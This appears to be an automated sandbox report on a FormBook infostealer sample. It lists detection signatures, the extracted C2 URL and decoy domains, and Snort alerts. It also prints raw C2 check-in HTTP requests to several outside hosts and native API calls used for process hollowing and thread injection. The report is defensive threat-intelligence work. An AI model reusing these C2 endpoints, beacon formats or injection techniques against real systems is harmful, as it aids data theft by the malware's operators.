Analysis Report 00098765123POIIU.exe

Overview

General Information

Sample Name: 00098765123POIIU.exe
Analysis ID: 411893
MD5: 4e2d6ab0c9a56aee76ba33bd26dce9b1
SHA1: 52950b4637fc55518efc063ced7bec0867f9051e
SHA256: 5e2255d59560c85c4a6c30ffa54e00b2805b584292de464befaf01a614539229
Tags: exe
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.hysjs168.com/uv34/"], "decoy": ["lattakia-imbiss.com", "helenafinaltouch.com", "yogamays.com", "habangli.com", "embraceblm.com", "freeurlsite.com", "szxanpet.com", "inspirationalsblog.com", "calibratefirearms.net", "chelseashalza.com", "ihdeuruim.com", "symbolofsafety.com", "albanyhumanesociety.net", "exclusiveoffer.bet", "888yuntu.com", "maraitime.com", "caletaexperience.com", "dreamlikeliving.com", "wolvesmito.club", "zbyunjin.com", "senkrononline.com", "thesugarbasket.com", "organiccbgoil.com", "amazoncor.xyz", "dofus-tr.com", "bhzconstrutora.com", "onlinepaintandsips.com", "sandybottomsflipflops.com", "paobuyingxiong.com", "wokeinteractive.com", "furbabiesandflowers.com", "hellojesse.com", "ssssummit.com", "vaiu-ks.com", "akb48-loveantena.com", "wagsorganics.com", "import-union.com", "sxrqsgs.icu", "72loca.com", "ssc018.com", "jewelta.com", "buildingdigitalmind.com", "pantechinsulation.com", "cobakoreksinjinx.com", "mischurretes.com", "contorig2.com", "julesecurity.com", "soccer-yokouchi.club", "gofourd.com", "holdimob.com", "omorashi-mania.com", "ytksw.com", "gsf-fashon.com", "bogolacke.com", "odislewis.com", "shenzhenmaojinchang.com", "kimsfist.com", "xsites-dev.xyz", "buraktradingltd.com", "muldentaxi.com", "supergurlmarketing.com", "areametalurgia.com", "dejikatsu.com", "pcbet999.com"]}
Multi AV Scanner detection for submitted file
Source: 00098765123POIIU.exe ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: 00098765123POIIU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 00098765123POIIU.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp
Source: Binary string: RegSvcs.pdb, source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.378316502.000000000109F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
Source: Binary string: wlanext.pdb source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
Source: Binary string: RegSvcs.pdb source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
Source: Binary string: wlanext.pdbGCTL source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop edi 3_2_0040C3D5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 4x nop then pop edi 7_2_032FC3D5

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 173.236.152.151:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 173.236.152.151:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 173.236.152.151:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.hysjs168.com/uv34/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=PNkuYexmaEbpw3EaQG1gqEXEhReu9m0wSncWUc9u1VG5H+XH3gAiJ6++bzNk4ZSFpS3p79DaPA== HTTP/1.1 Host: www.contorig2.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?D0Dhj=I0+BvmO4ljK/nbLycIQPHPNytqxJ+McfjEJZrssF4WFDr3bjf8ExST5+Hjhrql3HpJj1V9F8nQ==&_JB=SL3d2L8 HTTP/1.1 Host: www.muldentaxi.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=JPLVpJ2/QgCmFDz5d9+MEwsOtRSRnv4p4HgKpBtvwLNy+R4nAh4AcVIWdvhB9Yv67aR/bJ0jJQ== HTTP/1.1 Host: www.gofourd.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?D0Dhj=zJB2497tyCkLF9DVAXbTh77yBITnH8u2gz7PlO+nNFbEPXoEJKTpFMEIIpupFtT+IJYk9y/VZw==&_JB=SL3d2L8 HTTP/1.1 Host: www.ihdeuruim.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=eNNoAymEF6y0s09AHznbvWkLlOIpJJQGxSgvNiYX7faSVxdWVtwFBOGKoePvfd+8zgTPPgb0Mw== HTTP/1.1 Host: www.embraceblm.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?D0Dhj=OWF93oT5YKzzQXpFcytjmkfHvlUSZBJisBPI3VKZy/Exqh7cdZ6jotFcBNfsZIZ5A8+OquT2pg==&_JB=SL3d2L8 HTTP/1.1 Host: www.ytksw.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg== HTTP/1.1 Host: www.buraktradingltd.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?D0Dhj=+vqKyqUCNNB8UOC5vqb0WBoKaqjxAK/4hHhktlBEWoOvrJqCXDBsl1GlrElBRZa3I6kwNHO8pA==&_JB=SL3d2L8 HTTP/1.1 Host: www.bogolacke.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=n+Qx4VWs28a7eV8im5Y5Lb9MLKmoTPPxFKEnTVg2IpEKdb6ImeQQO/tB44tc09WLnIG/s9VgcA== HTTP/1.1 Host: www.albanyhumanesociety.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXFRWiHaQS6pCkVOSpw== HTTP/1.1 Host: www.sandybottomsflipflops.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.54.117.217 198.54.117.217
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: unknown DNS traffic detected: queries for: www.contorig2.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 12 May 2021 06:41:48 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 328 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 76 33 34 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uv34/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: 00098765123POIIU.exe, 00000000.00000002.337814717.0000000003261000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.341318764.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004181B0 NtCreateFile, 3_2_004181B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00418260 NtReadFile, 3_2_00418260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004182E0 NtClose, 3_2_004182E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00418390 NtAllocateVirtualMemory, 3_2_00418390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004181AA NtCreateFile, 3_2_004181AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041825A NtReadFile, 3_2_0041825A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004182DA NtClose, 3_2_004182DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00FE98F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00FE9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9840 NtDelayExecution,LdrInitializeThunk, 3_2_00FE9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE99A0 NtCreateSection,LdrInitializeThunk, 3_2_00FE99A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00FE9910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9A50 NtCreateFile,LdrInitializeThunk, 3_2_00FE9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9A20 NtResumeThread,LdrInitializeThunk, 3_2_00FE9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00FE9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE95D0 NtClose,LdrInitializeThunk, 3_2_00FE95D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9540 NtReadFile,LdrInitializeThunk, 3_2_00FE9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00FE96E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00FE9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00FE9FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00FE97A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00FE9780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00FE9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE98A0 NtWriteVirtualMemory, 3_2_00FE98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FEB040 NtSuspendThread, 3_2_00FEB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9820 NtEnumerateKey, 3_2_00FE9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE99D0 NtCreateProcessEx, 3_2_00FE99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9950 NtQueueApcThread, 3_2_00FE9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9A80 NtOpenDirectoryObject, 3_2_00FE9A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9A10 NtQuerySection, 3_2_00FE9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FEA3B0 NtGetContextThread, 3_2_00FEA3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9B00 NtSetValueKey, 3_2_00FE9B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE95F0 NtQueryInformationFile, 3_2_00FE95F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9560 NtWriteFile, 3_2_00FE9560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FEAD30 NtSetContextThread, 3_2_00FEAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9520 NtWaitForSingleObject, 3_2_00FE9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE96D0 NtCreateKey, 3_2_00FE96D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9670 NtQueryInformationProcess, 3_2_00FE9670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9650 NtQueryValueKey, 3_2_00FE9650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9610 NtEnumerateValueKey, 3_2_00FE9610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9770 NtSetInformationFile, 3_2_00FE9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FEA770 NtOpenThread, 3_2_00FEA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9760 NtOpenProcess, 3_2_00FE9760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9730 NtQueryVirtualMemory, 3_2_00FE9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FEA710 NtOpenProcessToken, 3_2_00FEA710
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_03308390 NtAllocateVirtualMemory, 7_2_03308390
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_03308260 NtReadFile, 7_2_03308260
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_033082E0 NtClose, 7_2_033082E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_033081B0 NtCreateFile, 7_2_033081B0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330825A NtReadFile, 7_2_0330825A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_033082DA NtClose, 7_2_033082DA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_033081AA NtCreateFile, 7_2_033081AA
Detected potential crypto function
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_00E55871 0_2_00E55871
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_00E559CA 0_2_00E559CA
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_00E55998 0_2_00E55998
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_00E56501 0_2_00E56501
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_0310B15C 0_2_0310B15C
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_0310C428 0_2_0310C428
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_03109890 0_2_03109890
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_0310DE90 0_2_0310DE90
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_0310FD5F 0_2_0310FD5F
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_0310FD70 0_2_0310FD70
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057D4418 0_2_057D4418
